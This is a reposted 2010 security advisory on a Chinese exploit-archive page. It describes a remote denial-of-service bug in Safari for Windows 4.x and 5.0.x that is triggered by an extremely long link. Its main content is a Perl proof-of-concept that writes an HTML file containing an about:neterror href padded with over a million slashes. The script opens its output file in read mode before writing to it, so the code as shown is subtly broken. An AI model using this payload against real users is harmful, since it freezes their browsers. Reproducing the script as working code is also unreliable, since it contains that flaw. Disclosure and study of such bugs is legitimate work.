首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Safari for windows Long link DoS 来源：http://lostmon.blogspot.com 作者：Lostmon 发布时间：2010-08-16   ############################################ Safari for windows Long link DoS Vendor URL:http://www.apple.com/safari/ Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html Vendor notified:Yes exploit available: YES Category : remote DoS ############################################ Safari is prone vulnerable to Dos with a very long Link... This issue is exploitable via web links like <a href="very long URL"> click here</a> or similar vectors. Safari fails to render the link and it turn Frozen resulting in a Denial of service condition. ################# Versions Tested ################# I have tested this issue in win xp sp3 and a windows 7 fully pached. Win XP sp3: Safari 5.0.X vulnerable Safari 4.xx vulnerable windows 7 Ultimate: Safari 5.0.X vulnerable Safari 4.xx vulnerable ############ References ############ Discovered: 29-07-2010 vendor notify:31-07-2010 Vendor Response: Vendor patch: #################### Proof Of Concept #################### ####################################################################### #!/usr/bin/perl # safari Long "a href" Link DoS # Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com # Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS # generate the file open it with safari wait a seconds ###################################################################### $archivo = $ARGV[0]; if(!defined($archivo)) { print "Usage: $0 <archivo.html>\n"; } $cabecera = "<html>" . "\n"; $payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n"; $fin = "</html>"; $datos = $cabecera . $payload . $fin; open(FILE, '<' . $archivo); print FILE $datos; close(FILE); exit; ################## EOF ###################### ############## Related Links ############## vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251 Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474 Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776 ###################### Ђnd ############################# Thnx to Phreak for support and let me undestanding the nature of this bug thnx to jajoni for test it in windows 7 X64 bits version. -- atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·K-Meleon for windows about net ·linux/x86 setuid(0) && execve( ·CMSQLite <= 1.2 & CMySQLite <= ·linux/x86 setuid(0) && execve( ·Rosoft media player 4.4.4 SEH ·123 Flashchat version 7.8 Mult ·Computer Associates Advantage ·MUSE v4.9.0.006 (.m3u) Local B ·Adobe ColdFusion Directory Tra ·MUSE v4.9.0.006 (.pls) Local U ·SmartCode ServerX VNC Server A ·Dlink WBR-2310 Wireless Router   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved